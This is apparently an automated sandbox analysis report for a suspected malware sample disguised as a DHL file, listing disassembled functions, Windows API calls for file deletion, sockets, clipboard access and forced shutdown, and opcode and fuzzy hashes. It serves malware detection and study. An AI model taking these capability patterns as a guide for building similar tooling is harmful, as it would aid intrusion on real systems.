                                                                                      • Opcode ID: d20da0edb48ee083e9df80cf31b6d65a6449401dbf2bfc3f6f0ddded12f3fb97
                                                                                      • Instruction ID: f7706b54fab98518ca4b8a67497de0c6fe53826ffa11b17fa30fd226d106cc36
                                                                                      • Opcode Fuzzy Hash: d20da0edb48ee083e9df80cf31b6d65a6449401dbf2bfc3f6f0ddded12f3fb97
                                                                                      • Instruction Fuzzy Hash: CBD14CB2508300AEC714EBA4CC96EABB7ECEF89704F44491DF585D6191EB74DA48CB72
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E19663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E196A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00E196BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E196D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E196DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E196FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E1974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(00E66B7C), ref: 00E19768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E19772
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E1977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E1978F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 44d0d81bc65ef663a03a7ea1ca57374523cd224b25dbfa88890a874d12bfe003
                                                                                      • Instruction ID: 6c1c344e4fcee3d8fe60bd75dfa52b357098028a671c198c32ea42acc8a81fb5
                                                                                      • Opcode Fuzzy Hash: 44d0d81bc65ef663a03a7ea1ca57374523cd224b25dbfa88890a874d12bfe003
                                                                                      • Instruction Fuzzy Hash: F731A23254061A6EDB14AFB5EC5DADE7BAC9F09324F205196F815F30E1DB34D9848B24
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E197BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E19819
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E19824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E19840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E19890
                                                                                      • SetCurrentDirectoryW.KERNEL32(00E66B7C), ref: 00E198AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E198B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E198C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E198D5
                                                                                        • Part of subcall function 00E0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E0DB00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 57df03b351bfeaddb101a47cf5ef8929590daa772ab077c98fd705fe51907fd0
                                                                                      • Instruction ID: e611f6d213e6b8eb59111d8724ed283586bf4f56d369f89f19fc74750fa214e5
                                                                                      • Opcode Fuzzy Hash: 57df03b351bfeaddb101a47cf5ef8929590daa772ab077c98fd705fe51907fd0
                                                                                      • Instruction Fuzzy Hash: 0331C33254061A6EDB14AFB5EC58ADE7BACEF06324F2051A5E814B30A1DB30D9C9CB24
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00E18257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E18267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E18273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E18310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00E1838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E18395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 98990ad1254c50e99f7ee32560100f8d5e720f3369b73f5080dbedf48e25d0b9
                                                                                      • Instruction ID: e2e1623381117cd9c09ed1d36e6498fbb2e149a2396f10cd3935df0014243855
                                                                                      • Opcode Fuzzy Hash: 98990ad1254c50e99f7ee32560100f8d5e720f3369b73f5080dbedf48e25d0b9
                                                                                      • Instruction Fuzzy Hash: 1A616C725043459FC710EF60C84499EB3E8FF89314F04491EF999A7251EB31E989CBA2
                                                                                      APIs
                                                                                        • Part of subcall function 00DA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA3A97,?,?,00DA2E7F,?,?,?,00000000), ref: 00DA3AC2
                                                                                        • Part of subcall function 00E0E199: GetFileAttributesW.KERNEL32(?,00E0CF95), ref: 00E0E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E0D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E0D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E0D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E0D237
                                                                                        • Part of subcall function 00E0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E0D21C,?,?), ref: 00E0D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00E0D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E0D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: 606275ca877ce30043f6fe1841237406472aed7bae73a4c8cc5115bfda4456d6
                                                                                      • Instruction ID: 98bb51478be6ec31e4f22c9cbbfcfeb606da7845bba1e1f501e24d26d2d000fa
                                                                                      • Opcode Fuzzy Hash: 606275ca877ce30043f6fe1841237406472aed7bae73a4c8cc5115bfda4456d6
                                                                                      • Instruction Fuzzy Hash: B361393180511DAACF05EBE0DE929EEB7B5EF56304F249165E402771A1EB34AF49CB70
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: 8c709212fb7ff441051e07a0f6ba549652ed0f91d1043d750ab77a56bc354920
                                                                                      • Instruction ID: c265a14f780c7ba13d4a5b5a15787391d2cfed90fdd7cfb3929819b6dfe209c9
                                                                                      • Opcode Fuzzy Hash: 8c709212fb7ff441051e07a0f6ba549652ed0f91d1043d750ab77a56bc354920
                                                                                      • Instruction Fuzzy Hash: 5841A035204611AFD310DF26E849F59BBE1EF84328F14D099F819AB762C735EC85CBA0
                                                                                      APIs
                                                                                        • Part of subcall function 00E016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0170D
                                                                                        • Part of subcall function 00E016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E0173A
                                                                                        • Part of subcall function 00E016C3: GetLastError.KERNEL32 ref: 00E0174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00E0E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 26b1173f39d2b0838d519ecdcff2810aa8f24f3b14fc2248b7990911ba0d7da8
                                                                                      • Instruction ID: 28e259dee0e615504e0b9bda722ef59c9add36e09d5638189df14a894e017fa5
                                                                                      • Opcode Fuzzy Hash: 26b1173f39d2b0838d519ecdcff2810aa8f24f3b14fc2248b7990911ba0d7da8
                                                                                      • Instruction Fuzzy Hash: F8012633610316AFEB5422B5AC8ABBB729CA754744F642D71FC02F22D1D5A19CC48290
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E21276
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E21283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E212BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E212C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 00E212F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00E21303
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E2130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 00E2133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: 6528cb2402748b00f1b86a98961a7c19f3f1774f2cf1bb8f53d18ed539755fde
                                                                                      • Instruction ID: 198ba7248e2d553168a82e51916759c2e72f7b8e5427aeddf4d746db32c00f6f
                                                                                      • Opcode Fuzzy Hash: 6528cb2402748b00f1b86a98961a7c19f3f1774f2cf1bb8f53d18ed539755fde
                                                                                      • Instruction Fuzzy Hash: 9341A531600110DFD714DF24D488B29BBE6EF56318F2890C8E856AF2A2C771EE85CBE1
                                                                                      APIs
                                                                                        • Part of subcall function 00DA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA3A97,?,?,00DA2E7F,?,?,?,00000000), ref: 00DA3AC2
                                                                                        • Part of subcall function 00E0E199: GetFileAttributesW.KERNEL32(?,00E0CF95), ref: 00E0E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E0D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E0D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E0D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E0D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 69d19d2526469603c18c96bf48e008f841a49a3accc85b14ad7f0e9faeb4f8d5
                                                                                      • Instruction ID: ec54e709ff8c0ee13ab799444e62d578298ccc32721ffe99d3cfa8ddb637698d
                                                                                      • Opcode Fuzzy Hash: 69d19d2526469603c18c96bf48e008f841a49a3accc85b14ad7f0e9faeb4f8d5
                                                                                      • Instruction Fuzzy Hash: 1B314F7100C3559FC204EF64D8558AFB7A8EE96314F445A1DF4E563191EB34EA09CB72
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: c9564c7e88fbff5919433aad068851432ecbd12489300fd1b00659bb98ef9c72
                                                                                      • Instruction ID: bd101aa680c0d9bcc117b28670d87b7831ed674ec6a106922f1278fa5e8040ec
                                                                                      • Opcode Fuzzy Hash: c9564c7e88fbff5919433aad068851432ecbd12489300fd1b00659bb98ef9c72
                                                                                      • Instruction Fuzzy Hash: 7CC22871E046298BDB25DF28DD407EAB7B5EB49304F1941EBD84EE7240E774AE818F60
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00E164DC
                                                                                      • CoInitialize.OLE32(00000000), ref: 00E16639
                                                                                      • CoCreateInstance.OLE32(00E3FCF8,00000000,00000001,00E3FB68,?), ref: 00E16650
                                                                                      • CoUninitialize.OLE32 ref: 00E168D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 886957087-24824748
                                                                                      • Opcode ID: 7ee1f033861d390b411fd390e46899e373d4838c60d5bbb71cb07d9cf19ae940
                                                                                      • Instruction ID: 4c294fd502dffbe045dd57b79e44c373b8f9e4b76311ad82f765b987ce113cf0
                                                                                      • Opcode Fuzzy Hash: 7ee1f033861d390b411fd390e46899e373d4838c60d5bbb71cb07d9cf19ae940
                                                                                      • Instruction Fuzzy Hash: 62D15971508301AFC304EF24C891EABB7E9FF95304F00496DF5959B291EB31E945CBA2
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00E222E8
                                                                                        • Part of subcall function 00E1E4EC: GetWindowRect.USER32(?,?), ref: 00E1E504
                                                                                      • GetDesktopWindow.USER32 ref: 00E22312
                                                                                      • GetWindowRect.USER32(00000000), ref: 00E22319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E22355
                                                                                      • GetCursorPos.USER32(?), ref: 00E22381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E223DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: 5acec5544e478bd2f29170ef748e51fb98a99a106cce6eec81476cbf0fb8989a
                                                                                      • Instruction ID: 2c51f2aba086ce9f43dce7140113ce483b3f3d5e391d03822f5fa8e8b29627d2
                                                                                      • Opcode Fuzzy Hash: 5acec5544e478bd2f29170ef748e51fb98a99a106cce6eec81476cbf0fb8989a
                                                                                      • Instruction Fuzzy Hash: 3231EF72104316AFCB20DF15D809A9BBBE9FF84314F101A1DF985B7181DB34E908CB92
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E19B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E19C8B
                                                                                        • Part of subcall function 00E13874: GetInputState.USER32 ref: 00E138CB
                                                                                        • Part of subcall function 00E13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E13966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E19BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E19C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1972594611-438819550
                                                                                      • Opcode ID: c6438db0955fafb1bae38082a95bc854a1831acf82c8cfdba1737c7e8ef7567a
                                                                                      • Instruction ID: 22eec255fe2122c7d115148c19ce1693e278a762d2cbf48faaa23fcb51bfbd20
                                                                                      • Opcode Fuzzy Hash: c6438db0955fafb1bae38082a95bc854a1831acf82c8cfdba1737c7e8ef7567a
                                                                                      • Instruction Fuzzy Hash: AF415F7190420A9FCF14DF64C899AEEBBF8EF05314F245156E855B7292EB309E84CFA4
                                                                                      APIs
                                                                                        • Part of subcall function 00DB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00DB9BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00DB9A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 00DB9B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00DB9B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: ca2c23792f1e8e36e7a2a15b3c5359ac73f7453ecb606182b1ba9ef55af3758e
                                                                                      • Instruction ID: 527a56fc104d1b97213299a8f7867eb97837d0042b1ec1ff179713de0c15980c
                                                                                      • Opcode Fuzzy Hash: ca2c23792f1e8e36e7a2a15b3c5359ac73f7453ecb606182b1ba9ef55af3758e
                                                                                      • Instruction Fuzzy Hash: 8EA13E70108588FEE728AA3D8CADEFBBA9DDF42350F1A4109F743E6691CA25DD41C275
                                                                                      APIs
                                                                                        • Part of subcall function 00E2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E2307A
                                                                                        • Part of subcall function 00E2304E: _wcslen.LIBCMT ref: 00E2309B
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E2185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E21884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00E218DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 00E218E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 00E21915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1601658205-0
                                                                                      • Opcode ID: c83851afa336b42fd7ba39a39183ad4a34852560e4e557694f2c003fdc84d098
                                                                                      • Instruction ID: f059009607b0675427c3695319a9053668859b60cb40770f9f79393c615bc2fa
                                                                                      • Opcode Fuzzy Hash: c83851afa336b42fd7ba39a39183ad4a34852560e4e557694f2c003fdc84d098
